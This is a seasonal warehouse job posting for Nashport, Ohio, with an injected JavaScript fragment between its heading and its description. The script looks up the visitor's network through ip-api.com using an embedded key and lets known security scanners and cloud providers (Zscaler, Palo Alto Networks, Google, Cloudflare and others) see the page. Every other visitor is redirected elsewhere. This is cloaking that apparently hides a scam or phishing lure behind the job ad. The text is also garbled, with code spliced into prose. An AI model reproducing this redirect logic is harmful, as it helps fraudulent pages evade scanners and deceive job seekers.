Seasonal Full-Time Warehouse Associate
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a motivated Seasonal Full-Time Warehouse Associate to join our team in Nashport, Ohio, near Etna. In this role, you will support daily warehouse operations, ensuring efficient receipt, storage, and shipment of products.
- Unload, sort, and organize incoming inventory accurately and safely.
- Pick, pack, and prepare orders for shipment in a timely manner.
- Maintain a clean, organized, and safe work environment.
- Operate warehouse equipment such as forklifts and pallet jacks (training provided).
- Assist with inventory counts and reporting.
Skills needed include strong attention to detail, teamwork, reliability, and the ability to lift heavy loads. Prior warehouse experience is a plus but not required.
Benefits include competitive pay, flexible seasonal hours, employee discounts, and a supportive team environment. Join us for a rewarding seasonal opportunity in a dynamic warehouse setting!